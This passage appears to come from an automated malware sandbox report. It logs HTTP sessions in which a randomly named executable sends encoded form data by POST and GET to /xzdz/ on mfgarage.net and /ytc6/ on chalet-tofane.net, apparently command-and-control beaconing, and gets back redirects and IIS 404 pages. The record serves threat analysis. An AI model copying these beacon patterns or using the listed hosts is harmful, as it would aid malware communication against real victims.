                                              set-cookie: csid=kmC-rQXnV551daTsdzm7un-NEUxgDsVjkYM-_94wxBco287eNUmg6TpkfbcSlnKiBiB2bWcakOIfDF6evl-0dPfjQzck3-R4d2U6wxG74va9ZOlwWjE82D8QwG_PMeJ-VnJ_VUcXFagpwIQd20p_cC3TT9QV0Q92eEHavI64Y8BE7odmnMAnySf9eMljc71hW5oz1xrCAHkvt3V1M6FzM2Y23sD5n6aj-lctY89_VsrI4AyY2Pc_Ub7Vaa5fg5_uz6yW7MywnD3Ix2LRAS48pznF9_QGGWMOJ0SoQivXOVAuUCz7eu90tARBRE
                                              Data Raw:
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              34 | 192.168.11.30 | 49927 | 85.153.138.113 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:40.864876032 CEST | 781 | OUT | POST /xzdz/ HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.mfgarage.net
                                              Referer: http://www.mfgarage.net/xzdz/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 38 35 4e 31 45 70 31 68 6d 62 62 51 6d 2f 73 2f 68 33 48 52 4b 70 39 38 54 50 68 55 32 78 56 52 69 73 74 49 68 53 6b 34 68 76 54 6e 4d 32 6b 30 53 66 34 4a 49 58 68 71 37 72 4c 6c 63 4d 63 6b 64 30 79 6f 2b 54 4f 2b 70 50 65 62 6b 31 56 72 6f 71 6d 5a 4b 48 34 48 42 5a 47 6c 43 6f 4d 50 74 4d 4f 67 46 54 4b 73 73 57 6a 62 56 47 53 6e 46 39 49 43 5a 70 6e 79 47 43 66 53 4b 70 35 4c 35 7a 2b 38 58 51 4a 31 31 70 57 7a 42 57 61 43 56 6e 4d 53 6f 30 41 2f 45 45 77 6a 2f 76 4a 67 4f 39 53 46 76 2b 74 37 38 2f 5a 4e 38 76 44 46 39 76 56 4c 37 51 52 63 47 38 36 31 61 51 43 6c 42 6d 30 44 77 4f 5a 36 4b 38 44 4a 51 46 36 72 37 65 53 5a 74 59 34 3d
                                              Data Ascii: 7LY=85N1Ep1hmbbQm/s/h3HRKp98TPhU2xVRistIhSk4hvTnM2k0Sf4JIXhq7rLlcMckd0yo+TO+pPebk1VroqmZKH4HBZGlCoMPtMOgFTKssWjbVGSnF9ICZpnyGCfSKp5L5z+8XQJ11pWzBWaCVnMSo0A/EEwj/vJgO9SFv+t78/ZN8vDF9vVL7QRcG861aQClBm0DwOZ6K8DJQF6r7eSZtY4=
                                              Sep 24, 2024 11:28:41.112001896 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=337; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=1BGtKu8jmWdJBr9i66f28648; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=ODREVGgg9Kq4f9juJ-B-JfDSoTk2x9X-8jIOwM-RHQ6NlYQO_GeoVes87mjYAsHvkE9yhNfa32gfgQfTNwbwiw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=GxE-3Vi5JAMgkzWXoLSdzmhz1CMe0fB_7QzAFPUU97-Sp-CxX5050CCDYGuxzgdgdmqft6Ahyb8Ov-Aooz49eQ; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=f4e6ojsOlcta-4gTgDEBppXCjz4Fn7q2WheixI2KLsHFLVwZIRwi4ui2vb45Bg4zjugQcWpMCzA_DsSIHDX5M7lzncY1zSf5sYJ2K_7C_1Iem_Gsoy0bst2Y2n6vxTS34v_87t_irtFvooISJk9_c3SvF-oRFJvjjcyZBvP8Wp8kNqMrA--7ZjalWf5PlDiivlklRPiYXCt3ptMOYp9X3Z7r_J-mLwfMhfxPPlONmPGXDGnoBToP1UGiDwNJDx-V-25aQyGEm62lh5L0U9sbmQpLCjqvfhkFYaCxgavPSv6Ddd8QV22bPeVyEb
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:41.112015963 CEST | 240 | IN | Data Raw: 76 4f 6c 70 36 4a 65 69 35 77 78 51 6c 51 52 76 34 51 31 37 49 38 36 79 41 56 41 51 62 39 63 49 55 7a 66 61 59 73 34 44 30 38 5a 6f 6d 55 50 64 74 76 6c 44 42 33 32 74 47 6a 72 73 71 65 35 6a 4e 31 50 64 32 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68
                                              Data Ascii: vOlp6Jei5wxQlQRv4Q17I86yAVAQb9cIUzfaYs4D08ZomUPdtvlDB32tGjrsqe5jN1Pd2; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:40 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:41.112026930 CEST | 182 | IN | Data Raw: 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 66 67 61 72 61 67 65 2e 6e 65 74 25 32 46 78 7a 64 7a 25 32 46 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 54 75 65 2c 20 32 34 20 53 65 70 20 32 30 32 34
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2Fcontent-length: 0date: Tue, 24 Sep 2024 09:28:40 GMTserver: Sahibinden Web ServersX-Proxy: tmll-22 9,20200X-SECURE-OPTION: secure
                                              Sep 24, 2024 11:28:41.318276882 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=337; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=1BGtKu8jmWdJBr9i66f28648; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=ODREVGgg9Kq4f9juJ-B-JfDSoTk2x9X-8jIOwM-RHQ6NlYQO_GeoVes87mjYAsHvkE9yhNfa32gfgQfTNwbwiw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=GxE-3Vi5JAMgkzWXoLSdzmhz1CMe0fB_7QzAFPUU97-Sp-CxX5050CCDYGuxzgdgdmqft6Ahyb8Ov-Aooz49eQ; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=f4e6ojsOlcta-4gTgDEBppXCjz4Fn7q2WheixI2KLsHFLVwZIRwi4ui2vb45Bg4zjugQcWpMCzA_DsSIHDX5M7lzncY1zSf5sYJ2K_7C_1Iem_Gsoy0bst2Y2n6vxTS34v_87t_irtFvooISJk9_c3SvF-oRFJvjjcyZBvP8Wp8kNqMrA--7ZjalWf5PlDiivlklRPiYXCt3ptMOYp9X3Z7r_J-mLwfMhfxPPlONmPGXDGnoBToP1UGiDwNJDx-V-25aQyGEm62lh5L0U9sbmQpLCjqvfhkFYaCxgavPSv6Ddd8QV22bPeVyEb
                                              Data Raw:
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              35 | 192.168.11.30 | 49928 | 85.153.138.113 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:43.631062984 CEST | 1220 | OUT | POST /xzdz/ HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.mfgarage.net
                                              Referer: http://www.mfgarage.net/xzdz/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 38 35 4e 31 45 70 31 68 6d 62 62 51 6d 2f 73 2f 68 33 48 52 4b 70 39 38 54 50 68 55 32 78 56 52 69 73 74 49 68 53 6b 34 68 76 72 6e 4e 44 6f 30 55 2b 34 4a 61 6e 68 71 6c 62 4c 6b 63 4d 64 34 64 77 6d 57 2b 54 43 55 70 4a 43 62 6c 54 42 72 34 49 65 5a 5a 6e 34 48 65 70 47 67 63 59 4d 57 74 49 71 73 46 54 61 73 73 57 6a 62 56 45 4b 6e 54 35 6b 43 4b 35 6e 7a 50 69 66 65 42 4a 34 73 35 7a 6d 47 58 51 46 6c 31 71 6d 7a 42 6c 69 43 55 56 55 53 6f 30 41 2f 4b 6b 77 69 2f 75 31 6c 4f 39 4b 33 76 2f 55 4f 37 50 39 4e 73 49 79 49 35 64 56 51 35 78 64 4d 61 75 47 51 64 67 71 75 4b 56 34 61 37 50 42 67 46 63 57 6c 51 78 2b 32 6d 76 47 48 77 6f 65 65 71 54 50 4a 71 53 56 59 79 4e 70 37 38 48 67 33 61 4e 6d 69 61 52 49 51 35 38 48 77 79 44 4d 6a 41 52 61 48 44 54 45 47 71 62 52 6d 2b 33 77 61 74 39 75 78 75 75 33 62 33 32 55 33 73 47 36 6d 77 54 46 5a 54 30 69 72 66 33 33 6e 32 41 64 4b 4c 63 54 4d 31 44 4c 44 2f 39 39 77 73 41 2f 2f 52 6f 53 75 67 72 55 66 30 45 65 78 78 37 74 2b 56 63 65 42 41 65 [TRUNCATED]
                                              Data Ascii: 7LY=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
                                              Sep 24, 2024 11:28:43.631120920 CEST | 2678 | OUT
                                              Data Ascii: 9CzxO+dpygPl9Ol7+JyVYaR6ewBPcmFUuPtnorgFXGMC0CeldH8r3Kotnnvzu0lVNH7K67CxPr7rL4qcsh2BuBYqrst7r/CJBpQ4H+E43YvIeqifht/GWG46RPha41J76G2uMQNu/keutRzXoSw1Z6mm+eAavsrDjhCADoIf9c8XQtEar6j58Mo/m1UmYflyXouNDYZy4LW232WWdknjFxBfaOuQxf4RiRKb4om6SBDjIiLjGPo
                                              Sep 24, 2024 11:28:43.874447107 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=335; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=cp6gdw1ueIOQU6pq66f2864b; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=2Sosd-SgPhG8_P1ph2FWodPQIavsuAuT2fITEuUSizYoDa05iLf8ZRHosxBtuyJAv2Tsao_zp6HFFOOOmUYbSQ; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=i8h8QgA3QFnjT6rBVvnoop7VyBVVvdSZPpukfOo3Dxk9OPd5ChoBKEqGZ7VXl2piVquOvSTKZZtF9U6YoMIrnw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=GdCrwgFJPF5VQBt9713fwN0U4nIL26pyUqaVRBg3Dp7O0xIki64JIxQETNplfwQCwqZ9FTOG0rQPocLmWySueZ34WhjD9yUkoCtQZrBDgBfB4r5p9pu0LvkTC0aYo_WHxo2t0fM4-ME0qlDFQZdBFSk3YYU5cQ7GturmxMq8hEWGVb_u6L4ii_c9ST9PZo15GVMl4nei8eDWsMB-RUOdyfSPEl4fub1tfz4zvlcA4sSQbCgsBFNARCrGLVAHfQHQvnYvPKy1b-ovIlqZBC_o8OH6zk-yRZ__SwpViBjUn2B93JOpbpiJ7cNskT
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:43.874461889 CEST | 240 | IN
                                              Data Ascii: SwhogfbSU43czL9nRQBE54g-agEm4_aizV4tkvTVLeW101L78Sh_khnfkY6vo-8oSHVHq; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:43 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:43.874473095 CEST | 183 | IN
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F
                                              content-length: 0
                                              date: Tue, 24 Sep 2024 09:28:43 GMT
                                              server: Sahibinden Web Servers
                                              X-Proxy: tmll-32 13,20200
                                              X-SECURE-OPTION: secure
                                              Sep 24, 2024 11:28:44.078423023 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=335; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=cp6gdw1ueIOQU6pq66f2864b; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=2Sosd-SgPhG8_P1ph2FWodPQIavsuAuT2fITEuUSizYoDa05iLf8ZRHosxBtuyJAv2Tsao_zp6HFFOOOmUYbSQ; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=i8h8QgA3QFnjT6rBVvnoop7VyBVVvdSZPpukfOo3Dxk9OPd5ChoBKEqGZ7VXl2piVquOvSTKZZtF9U6YoMIrnw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=GdCrwgFJPF5VQBt9713fwN0U4nIL26pyUqaVRBg3Dp7O0xIki64JIxQETNplfwQCwqZ9FTOG0rQPocLmWySueZ34WhjD9yUkoCtQZrBDgBfB4r5p9pu0LvkTC0aYo_WHxo2t0fM4-ME0qlDFQZdBFSk3YYU5cQ7GturmxMq8hEWGVb_u6L4ii_c9ST9PZo15GVMl4nei8eDWsMB-RUOdyfSPEl4fub1tfz4zvlcA4sSQbCgsBFNARCrGLVAHfQHQvnYvPKy1b-ovIlqZBC_o8OH6zk-yRZ__SwpViBjUn2B93JOpbpiJ7cNskT
                                              Data Raw:
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              36 | 192.168.11.30 | 49929 | 85.153.138.113 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:46.398613930 CEST | 492 | OUT | GET /xzdz/?7LY=x7lVHcpwtLz16okLmHbGfKRnF/5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU+RCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk=&Nze=C0klVT HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:46.674077988 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=460; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=I34SzMBJwWsQgGSZ66f2864e; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=jD0VYwRgzCgWyucSMfr2Kns-Z_VYYkWhGF9xaQNo8ZCXhOzbdbT2n8Rmpjr0HXv-BmCsQIxM8_QeBDmBxhav6g; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=8LcScG9cEr_aNPhm1IRB7KxX22MEDbOKModLvhnf-RHnnbTt2gBenGZLFalZO46h41s_XySttqQeLz0EM9msow; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=W-x_7bu5NeR3CmsE-MXyHQwOeYwQmYYemP_HX__6AYguoSWvVGftfI5FgbYvg92mO0ocNIZC27cRq50OQOW7dDS6egXVhrlGReQ0T3SQaoJ-gzaCEuf-EXfot3b_gorx-uzZyg-dOTWeIOW4OOrStRT8QvoKpX5MBLzSX05s_hzUv8l7WOU6kcAOMohIV--nwP06iLDQMUaFnmorp7YrbgvFRCwRPWzleBp4NbcaSQKMZypXG1ELTZMnrUpm7mpuyF-f7JBS6qSe-FTyYH2jjiObV5qIhw0_iXDpy5GsUeKyHXYqU9rS4VYyij
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:46.674089909 CEST | 240 | IN
                                              Data Ascii: fV7GzqMv4JWTCnRalANk4jvYb9mgzfgJCVOPHv660nVdmLdgEHuekym0ErxsKJVfktDSp; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:46 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:46.674101114 CEST | 333 | IN
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F%3F7LY%3Dx7lVHcpwtLz16okLmHbGfKRnF%2F5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU%2BRCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk%3D%26Nze%3DC0klVT
                                              content-length: 0
                                              date: Tue, 24 Sep 2024 09:28:45 G
                                              Sep 24, 2024 11:28:46.880871058 CEST | 1220 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=460; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=I34SzMBJwWsQgGSZ66f2864e; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=jD0VYwRgzCgWyucSMfr2Kns-Z_VYYkWhGF9xaQNo8ZCXhOzbdbT2n8Rmpjr0HXv-BmCsQIxM8_QeBDmBxhav6g; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=8LcScG9cEr_aNPhm1IRB7KxX22MEDbOKModLvhnf-RHnnbTt2gBenGZLFalZO46h41s_XySttqQeLz0EM9msow; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=W-x_7bu5NeR3CmsE-MXyHQwOeYwQmYYemP_HX__6AYguoSWvVGftfI5FgbYvg92mO0ocNIZC27cRq50OQOW7dDS6egXVhrlGReQ0T3SQaoJ-gzaCEuf-EXfot3b_gorx-uzZyg-dOTWeIOW4OOrStRT8QvoKpX5MBLzSX05s_hzUv8l7WOU6kcAOMohIV--nwP06iLDQMUaFnmorp7YrbgvFRCwRPWzleBp4NbcaSQKMZypXG1ELTZMnrUpm7mpuyF-f7JBS6qSe-FTyYH2jjiObV5qIhw0_iXDpy5GsUeKyHXYqU9rS4VYyij
                                              Data Raw:
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              37 | 192.168.11.30 | 49930 | 62.149.128.40 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:52.359749079 CEST | 776 | OUT | POST /ytc6/ HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.chalet-tofane.net
                                              Referer: http://www.chalet-tofane.net/ytc6/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=cav+i0Zp9wbqG5fyY25BJyAMiQsAN+lATWYBx+0WBUJIM/obSyhV0O7+y03f8oSlnOTOGsZDZFIsWbH9mEgbia6Nb2M+cAbg6BOGMyUjJ5gbHnzTOu2VxO6kD5Ubkh1Z1LWd6Xox4AO7VpVShwWcK016B5FvYzPv5Xk+teSOZ7TJXkqUpC4lpU+77AT/hRZtRA==
                                              Sep 24, 2024 11:28:52.563117981 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:51 GMT
                                              Connection: close
                                              Content-Length: 4953
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:28:52.563168049 CEST | 1289 | IN
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:28:52.563249111 CEST | 1289 | IN
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:28:52.563262939 CEST | 1289 | IN
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:28:52.563272953 CEST | 16 | IN
                                              Data Ascii: body> </html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              38 | 192.168.11.30 | 49931 | 62.149.128.40 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:55.105057955 CEST | 796 | OUT | POST /ytc6/ HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.chalet-tofane.net
                                              Referer: http://www.chalet-tofane.net/ytc6/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=cav+i0Zp9wbqGZvyLFBBZiALtwsAEelETWEBx7VLBntINaUbTzhV1O7+qk3azIS7nOf8GtlDZFcsWb39mXIEiK6PRmM8Wgbg6BOGMyQFJ90bGXjTcf2Wve6lA5Ubgh1d1LWv6W0b4D67VolSii+dB014PZECd2uNik8ok8+vTZj8fTbO0BMn60CWnB+XjTY2MHkohc027VbM7x7b5BQAvyg=
                                              Sep 24, 2024 11:28:55.308546066 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:54 GMT
                                              Connection: close
                                              Content-Length: 4953
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:28:55.308566093 CEST | 1289 | IN
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:28:55.308593988 CEST | 1289 | IN
